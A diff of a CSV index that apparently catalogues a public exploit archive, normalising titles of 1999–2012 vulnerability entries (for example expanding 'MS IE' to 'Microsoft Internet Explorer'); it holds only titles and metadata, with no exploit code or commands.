19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow Vulnerability (2)",1999-11-04,"Alberto Solino",windows,remote,0 19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 RCPT TO DoS Vulnerability",1999-10-28,"Nobuo Miwa",multiple,dos,0 @@ -16920,18 +16920,18 @@ id,file,description,date,author,platform,type,port 19588,platforms/windows/remote/19588.c,"IBM HomePagePrint 1.0 7 Buffer Overflow Vulnerability",1999-11-02,UNYUN,windows,remote,0 19589,platforms/windows/remote/19589.txt,"Avirt Gateway Suite 3.3/3.3 a/3.5 Directory Creation Vulnerability",1999-10-31,"Jesús López de Aguileta",windows,remote,0 19590,platforms/unix/local/19590.c,"Hylafax Hylafax 4.0.2 - Buffer Overflow Vulnerability",1999-11-03,"Brock Tellier",unix,local,0 -19591,platforms/windows/remote/19591.txt,"MS IE 4.0/5.0,Outlook 98 0 window.open Redirect Vulnerability",1999-11-04,"Georgi Guninski",windows,remote,0 -19592,platforms/windows/remote/19592.asm,"Real Networks GameHouse dldisplay ActiveX control 0 Port Buffer Overflow (1)",1999-11-04,"dark spyrit",windows,remote,0 -19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control 0 Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0 +19591,platforms/windows/remote/19591.txt,"Microsoft Internet Explorer 4.0/5.0,Outlook 98 - window.open Redirect Vulnerability",1999-11-04,"Georgi Guninski",windows,remote,0 +19592,platforms/windows/remote/19592.asm,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (1)",1999-11-04,"dark spyrit",windows,remote,0 +19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0 19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability",1999-11-04,"Marc of eEye",windows,local,0 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilties",1999-11-03,Kerb,windows,remote,0 19596,platforms/windows/remote/19596.txt,"Byte Fusion BFTelnet 1.1 Long Username DoS Vulnerability",1999-11-03,"Ussr Labs",windows,remote,0 19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 -19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal vulnerability",1999-11-04,"Ussr Labs",windows,remote,0 +19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal Vulnerability",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8 .x Socket Hijack Vulnerability",1999-11-05,"Michal Zalewski",linux,local,0 -19603,platforms/windows/remote/19603.txt,"MS IE 4.x/5.0,Outlook 2000 0/98 0/Express 4.x ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 +19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5.0,Outlook 2000 0/98 0/Express 4.x ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 19605,platforms/linux/dos/19605.c,"Linux Kernel - fs/eventpoll.c Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 19607,platforms/windows/remote/19607.c,"Windows 95/98 UNC Buffer Overflow Vulnerability (1)",1999-11-09,UNYUN,windows,remote,0 19608,platforms/windows/remote/19608.c,"Windows 95/98 UNC Buffer Overflow Vulnerability (2)",1999-11-09,UNYUN,windows,remote,0 @@ -16944,7 +16944,7 @@ id,file,description,date,author,platform,type,port 19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2,IRIX <= 6.5.17,Solaris 7.0 (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0 19616,platforms/windows/remote/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 POP3 Buffer Overflow Denial of Service",1999-11-08,Interrupt,windows,remote,0 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow Vulnerability",1999-11-11,"Ussr Labs",windows,remote,0 -19618,platforms/windows/remote/19618.txt,"MS IE 5.0 Media Player ActiveX Error Message Vulnerability",1999-11-14,"Georgi Guninski",windows,remote,0 +19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message Vulnerability",1999-11-14,"Georgi Guninski",windows,remote,0 19619,platforms/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server DoS Vulnerability",1999-11-10,"Ussr Labs",windows,dos,0 19620,platforms/unix/remote/19620.txt,"Matt Wright FormHandler.cgi 2.0 Reply Attachment Vulnerability",1999-11-16,m4rcyS,unix,remote,0 19621,platforms/windows/remote/19621.c,"Admiral Systems EmailClub 1.0 .0.5 - Buffer Overflow Vulnerability",1999-11-15,UNYUN,windows,remote,0 @@ -16959,17 +16959,17 @@ id,file,description,date,author,platform,type,port 19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 diff.php Arbitrary Command Execution",2012-07-09,metasploit,php,webapps,0 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver Vulnerability",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19633,platforms/windows/local/19633.txt,"Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 -19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9 .x/6.0 .x Buffer Overflow Vulnerabilities",1999-11-13,scut,linux,remote,0 +19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9 .x/6.0 .x - Buffer Overflow Vulnerabilities",1999-11-13,scut,linux,remote,0 19635,platforms/solaris/remote/19635.c,"Sun Solaris 7.0 rpc.ttdbserver Denial of Service Vulnerability",1999-11-19,"Elias Levy",solaris,remote,0 19636,platforms/windows/remote/19636.txt,"Dick Lin ZetaMail 2.1 Login DoS Vulnerability",1999-11-18,"Ussr Labs",windows,remote,0 -19637,platforms/windows/remote/19637.txt,"MS IE 5.0 for Windows 2000/95/98/NT 4 XML HTTP Redirect Vulnerability",1999-11-22,"Georgi Guninksi",windows,remote,0 +19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5.0 for Windows 2000/95/98/NT 4 XML HTTP Redirect Vulnerability",1999-11-22,"Georgi Guninksi",windows,remote,0 19638,platforms/windows/remote/19638.c,"Microsoft SQL Server 7.0/7.0 SP1 NULL Data DoS Vulnerability",1999-11-19,"Kevork Belian",windows,remote,0 -19639,platforms/windows/dos/19639.txt,"Alt-N MDaemon 2.8.5 0 WebConfig Overflow DoS Vulnerability",1999-11-24,"Ussr Labs",windows,dos,0 +19639,platforms/windows/dos/19639.txt,"Alt-N MDaemon 2.8.5 - WebConfig Overflow DoS Vulnerability",1999-11-24,"Ussr Labs",windows,dos,0 19640,platforms/windows/remote/19640.txt,"Alt-N WorldClient Pro 2.0 .0.0/2.0.1 .0/Standard 2.0 .0.0 Long URL DoS Vulnerability",1999-11-26,"Ussr Labs",windows,remote,0 19641,platforms/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 Xsco Buffer Overflow Vulnerability",1999-11-25,K2,sco,local,0 19642,platforms/sco/local/19642.c,"SCO Unixware 7.0 xlock(1) (long username) Buffer Overflow Vulnerability",1999-11-25,AK,sco,local,0 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 su(1) Buffer Overflow Vulnerability",1999-10-30,K2,sco,local,0 -19644,platforms/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal vulnerability",1999-11-29,"Ussr Labs",multiple,remote,0 +19644,platforms/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal Vulnerability",1999-11-29,"Ussr Labs",multiple,remote,0 19645,platforms/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 Remote Buffer Overflow Vulnerability (1)",1999-11-30,Mixter,unix,remote,0 19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 Remote Buffer Overflow Vulnerability (2)",1999-11-30,"Synnergy Networks",unix,remote,0 19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure",1999-11-30,UNYUN,solaris,local,0 @@ -17011,7 +17011,7 @@ id,file,description,date,author,platform,type,port 19683,platforms/windows/local/19683.c,"Ipswitch IMail 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 Weak Password Encryption Vulnerability",1999-12-19,"Mike Davis",windows,local,0 19684,platforms/multiple/local/19684.c,"SCO Open Server 5.0.5,IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library Buffer Overflows Vulnerability",1999-12-20,"Last Stage of Delirium",multiple,local,0 19685,platforms/freebsd/local/19685.txt,"Windowmaker wmmon 1.0 b2 Vulnerability",1999-12-22,"Steve Reid",freebsd,local,0 -19686,platforms/multiple/remote/19686.txt,"MS IE 4/5/5.5/5.0.1 external.NavigateAndFind() Cross-Frame Vulnerability",1999-12-22,"Georgi Guninski",multiple,remote,0 +19686,platforms/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 external.NavigateAndFind() Cross-Frame Vulnerability",1999-12-22,"Georgi Guninski",multiple,remote,0 19687,platforms/freebsd/dos/19687.c,"Real Networks Real Server 5.0 ramgen Denial of Service Vulnerability",1999-12-23,bow,freebsd,dos,0 19688,platforms/windows/remote/19688.txt,"ZBServer Pro 1.5 - Buffer Overflow Vulnerability (1)",1999-12-23,"Ussr Labs",windows,remote,0 19689,platforms/windows/remote/19689.c,"ZBServer Pro 1.5 - Buffer Overflow Vulnerability (2)",1999-12-23,Izan,windows,remote,0 @@ -17044,29 +17044,29 @@ id,file,description,date,author,platform,type,port 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0 19718,platforms/windows/remote/19718.rb,"AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,metasploit,windows,remote,0 -19719,platforms/windows/remote/19719.txt,"MS IE 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag Vulnerability",2000-01-07,"Georgi Guninski",windows,remote,0 +19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag Vulnerability",2000-01-07,"Georgi Guninski",windows,remote,0 19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing Vulnerability",2000-02-15,"Viktor Fougstedt",multiple,local,0 19722,platforms/unix/remote/19722.txt,"RedHat <= 6.1,IRIX <= 6.5.18 lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0 19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH Vulnerability",2000-01-12,"Cesar Tascon Alvarez",linux,local,0 -19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99 b 1.1.1.1/3.19 Remote Buffer Overflow Vulnerability",2000-01-12,"Drew Copley",windows,remote,0 +19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99 b 1.1.1.1/3.19 - Remote Buffer Overflow Vulnerability",2000-01-12,"Drew Copley",windows,remote,0 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service Vulnerability",2000-01-13,"Ussr Labs",windows,dos,0 19726,platforms/bsd/local/19726.c,"FreeBSD <= 3.4,NetBSD <= 1.4.1,OpenBSD <= 2.6 /proc File Sytem Vulnerability",2000-01-21,Nergal,bsd,local,0 19727,platforms/linux/local/19727.c,"Inter7 vpopmail (vchkpw) <= 3.4.11 Buffer Overflow Vulnerability",2000-01-21,K2,linux,local,0 19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 Default Permissions Vulnerability",1999-12-29,"Frank Monroe",windows,local,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 'LIST' Buffer Overflow Vulnerability",2000-01-10,Zhodiac,linux,remote,0 19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 WebMail Long GET Request Vulnerability",2000-01-17,"Greg Hoglund",windows,remote,0 -19731,platforms/windows/remote/19731.c,"microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 +19731,platforms/windows/remote/19731.c,"Microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script Tag Checking Bypass Vulnerability",2000-01-29,"Arne Vidstrom",multiple,remote,0 19733,platforms/windows/local/19733.txt,"McAfee 4.0,Network Associates for Windows NT 4.0.2/4.0.3 a,Norton AntiVirus 2000 Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local,0 19734,platforms/windows/remote/19734.java,"Microsoft Virtual Machine 2000 Series/3000 Series getSystemResource Vulnerability",2000-01-31,"Hiromitsu Takagi",windows,remote,0 19735,platforms/linux/local/19735.txt,"Debian Linux 2.1 - apcd Symlink Vulnerability",2000-02-01,anonymous,linux,local,0 -19737,platforms/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,windows,remote,0 -19738,platforms/windows/remote/19738.txt,"MS Outlook Express 5 Javascript Email Access Vulnerability",2000-02-01,"Georgi Guninski",windows,remote,0 +19737,platforms/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 - Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,windows,remote,0 +19738,platforms/windows/remote/19738.txt,"Microsoft Outlook Express 5 Javascript Email Access Vulnerability",2000-02-01,"Georgi Guninski",windows,remote,0 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0 19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67 -3 CWD/MKD DoS Vulnerability",2000-02-03,crc,windows,dos,0 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 SQL Command Input Vulnerability",2000-02-03,"rain forest puppy",cgi,remote,0 -19742,platforms/multiple/remote/19742.txt,"microsoft iis 3.0/4.0,microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 +19742,platforms/multiple/remote/19742.txt,"Microsoft iis 3.0/4.0,Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b,Windows 2000/95/98/NT 4.0 Shortcut Vulnerability",2000-02-04,"Ussr Labs",windows,remote,0 19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack DoS",2000-02-07,"Adam Gray",novell,dos,0 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 BETA Pipe Vulnerability",2000-02-04,"Iain Wade",cgi,remote,0 @@ -17077,7 +17077,7 @@ id,file,description,date,author,platform,type,port 19750,platforms/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 DoS Vulnerability",2000-02-11,eth0,multiple,dos,0 19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO,Brocade Fabric OS,MatchBox,Win98/NT4,Solaris,Xyplex SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 ARCserver /tmp symlink Vulnerability",2000-02-15,"Shawn Bracken",sco,local,0 -19753,platforms/windows/remote/19753.txt,"ms frontpage personal webserver 1.0/personal web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 +19753,platforms/windows/remote/19753.txt,"Microsoft frontpage personal webserver 1.0/personal web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability",2000-02-18,"Eric Stevens",windows,local,0 19755,platforms/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos,0 19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu Vulnerability",2000-02-19,anonymous,freebsd,local,0 @@ -17108,7 +17108,7 @@ id,file,description,date,author,platform,type,port 19784,platforms/multiple/remote/19784.txt,"Axis Communications StorPoint CD Authentication Vulnerability",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote,0 19785,platforms/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote,0 19786,platforms/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 Input Validation Vulnerability",2000-03-02,"Jonathan Leto",cgi,remote,0 -19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 Dosemu Distribution Configuration Vulnerability",2000-03-02,suid,linux,local,0 +19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 DoSemu Distribution Configuration Vulnerability",2000-03-02,suid,linux,local,0 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0,SGI IRIX 6.5.x fname Vulnerability",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow Vulnerability",2000-03-06,dildog,windows,local,0 19790,platforms/php/webapps/19790.txt,"webpagetest <= 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 @@ -17120,7 +17120,7 @@ id,file,description,date,author,platform,type,port 19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 mtr Vulnerability (2)",2000-03-03,"Babcia Padlina",multiple,local,0 19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 Arbitrary File Read Vulnerability",2000-03-09,"Vanja Hrustic",unix,remote,0 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 User Shell Folders Vulnerability",2000-03-09,anonymous,windows,local,0 -19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 MS DoS Device Name DoS",2000-03-04,anonymous,windows,dos,0 +19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name DoS",2000-03-04,anonymous,windows,dos,0 19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0,Cisco PIX Firewall 4.x/5.x ""ALG"" Client Vulnerability",2000-03-10,"Dug Song",multiple,remote,0 19801,platforms/linux/remote/19801.c,"Michael Sandrof IrcII 4.4 -7 Buffer Overflow Vulnerability",2000-03-10,bladi,linux,remote,0 19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow Vulnerability (1)",2000-03-11,Krahmer,linux,local,0 @@ -17136,7 +17136,7 @@ id,file,description,date,author,platform,type,port 19812,platforms/linux/local/19812.c,"Halloween Linux 4.0,RedHat Linux 6.1/6.2 imwheel Vulnerability (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0,S.u.S.E. Linux 6.0/6.1/6.2/6.3 kreatecd Vulnerability",2000-03-16,Sebastian,linux,local,0 19814,platforms/multiple/remote/19814.c,"Netscape Enterprise Server 3.0/3.6/3.51 Directory Indexing Vulnerability",2000-03-17,"Gabriel Maggiotti",multiple,remote,0 -19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal vulnerability",2000-03-21,"Johan Nilsson",windows,remote,0 +19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal Vulnerability",2000-03-21,"Johan Nilsson",windows,remote,0 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19,Debian 2.x,RedHat 6.x,S.u.S.E 5.3/6.x gpm Setgid Vulnerability",2000-03-22,"Egmont Koblinger",linux,local,0 19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0 19818,platforms/linux/local/19818.c,"Linux kernel 2.2.12/2.2.14/2.3.99,RedHat 6.x Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,local,0 @@ -17145,7 +17145,7 @@ id,file,description,date,author,platform,type,port 19821,platforms/multiple/local/19821.c,"Citrix MetaFrame 1.0/1.8 Weak Encryption Vulnerability",2000-03-29,"Dug Song",multiple,local,0 19822,platforms/irix/remote/19822.c,"SGI IRIX 5.x/6.x Objectserver Vulnerability",2000-03-29,"Last Stage of Delirium",irix,remote,0 19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 Machine Vulnerabilities",2000-03-24,kadokev,unix,local,0 -19824,platforms/multiple/remote/19824.txt,"MS IIS 4.0 UNC Mapped Virtual Host Vulnerability",2000-03-30,"Adam Coyne",multiple,remote,0 +19824,platforms/multiple/remote/19824.txt,"Microsoft IIS 4.0 UNC Mapped Virtual Host Vulnerability",2000-03-30,"Adam Coyne",multiple,remote,0 19825,platforms/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps,0 19827,platforms/windows/dos/19827.txt,"NT 4.0 / Windows 2000 TCP/IP Printing Service DoS Vulnerability",2000-03-30,"Ussr Labs",windows,dos,0 19828,platforms/multiple/remote/19828.txt,"Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability",2000-03-31,"Paul Schreiber",multiple,remote,0 @@ -17162,11 +17162,11 @@ id,file,description,date,author,platform,type,port 19839,platforms/windows/local/19839.txt,"CRYPTOCard CRYPTOAdmin 4.1 Weak Encryption Vulnerability (2)",2000-04-10,kingpin,windows,local,0 19840,platforms/beos/local/19840.txt,"Be BeOS 4.5/5.0 Invalid System Call Vulnerability",2000-04-10,"Konstantin Boldyshev",beos,local,0 19841,platforms/beos/local/19841.casl,"Be BeOS 4.0/4.5/5.0 IP Packet Length Field Vulnerability",2000-04-07,"Tim Newsham",beos,local,0 -19842,platforms/cgi/remote/19842.txt,"TalentSoft Web+ 4.x Directory Traversal Vulnerability",2000-04-12,"John P. McNeely",cgi,remote,0 +19842,platforms/cgi/remote/19842.txt,"TalentSoft Web+ 4.x - Directory Traversal Vulnerability",2000-04-12,"John P. McNeely",cgi,remote,0 19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 Malformed Request Remote DoS",2000-04-12,eAX,windows,dos,0 19844,platforms/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 bizdb-search.cgi Remote Command Execution Vulnerability",2000-04-13,"PErfecto Technology",cgi,remote,0 -19845,platforms/windows/remote/19845.pl,"MS FrontPage 98 Server Extensions for IIS,MS InterDev 1.0 Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote,0 -19846,platforms/windows/remote/19846.pl,"MS FrontPage 98 Server Extensions for IIS,MS InterDev 1.0 - Buffer Overflow Vulnerability",2000-04-14,"Richie & Beto",windows,remote,0 +19845,platforms/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS,Microsoft InterDev 1.0 Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote,0 +19846,platforms/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS,Microsoft InterDev 1.0 - Buffer Overflow Vulnerability",2000-04-14,"Richie & Beto",windows,remote,0 19847,platforms/unix/remote/19847.c,"UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0 19848,platforms/unix/remote/19848.pm,"UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0 19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0 @@ -17207,7 +17207,7 @@ id,file,description,date,author,platform,type,port 19887,platforms/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote,0 19888,platforms/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (3)",2002-01-18,g463,multiple,remote,0 19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name Vulnerability",2000-05-02,"rain forest puppy",windows,remote,0 -19890,platforms/cgi/remote/19890.txt,"ultrascripts ultraboard 1.6 - Directory Traversal vulnerability",2000-05-03,"Rudi Carell",cgi,remote,0 +19890,platforms/cgi/remote/19890.txt,"ultrascripts ultraboard 1.6 - Directory Traversal Vulnerability",2000-05-03,"Rudi Carell",cgi,remote,0 19891,platforms/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (1)",1999-05-31,"Hugo Breton",linux,remote,0 19892,platforms/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (2)",1999-05-31,scut,linux,remote,0 19893,platforms/windows/remote/19893.c,"L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability",2000-05-01,"David Litchfield",windows,remote,0 @@ -17249,7 +17249,7 @@ id,file,description,date,author,platform,type,port 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",2012-07-19,metasploit,windows,remote,998 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow",2012-07-19,metasploit,windows,remote,998 19933,platforms/linux/local/19933.rb,"Linux Kernel - Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0 -19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0 +19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS Vulnerability",2000-05-18,visi0n,beos,dos,0 19939,platforms/windows/remote/19939.html,"Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0 19940,platforms/windows/dos/19940.c,"Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (1)",2000-05-18,"rain forest puppy",windows,dos,0 @@ -17261,14 +17261,14 @@ id,file,description,date,author,platform,type,port 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 /usr/tmp/ Symlink Vulnerability",2000-04-21,anonymous,linux,local,0 19947,platforms/linux/remote/19947.c,"gdm 1.0 .x/2.0 .x BETA/2.2 .0 XDMCP Buffer Overflow Vulnerability (1)",2000-05-22,"Chris Evans",linux,remote,0 19948,platforms/linux/remote/19948.c,"gdm 1.0 .x/2.0 .x BETA/2.2 .0 XDMCP Buffer Overflow Vulnerability (2)",2000-05-22,AbraxaS,linux,remote,0 -19949,platforms/irix/remote/19949.c,"Gauntlet Firewall 4.1/4.2/5.0,WebShield E-ppliance 100.0/300.0,IRIX 6.5.x Remote Buffer Overflow",2000-05-18,_Gramble_,irix,remote,0 +19949,platforms/irix/remote/19949.c,"Gauntlet Firewall 4.1/4.2/5.0,WebShield E-ppliance 100.0/300.0,IRIX 6.5.x - Remote Buffer Overflow",2000-05-18,_Gramble_,irix,remote,0 19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver Denial of Service Vulnerability",2000-05-18,"Chris Evans",linux,dos,0 19951,platforms/cgi/remote/19951.php,"QuickCommerce 2.5/3.0,Cart32 2.5 a/3.0,Shop Express 1.0,StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability",2000-02-01,CDI,cgi,remote,0 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0,Slackware 3.x/4.0,Turbolinux 6,OpenLinux 7.0 fdmount Buffer Overflow 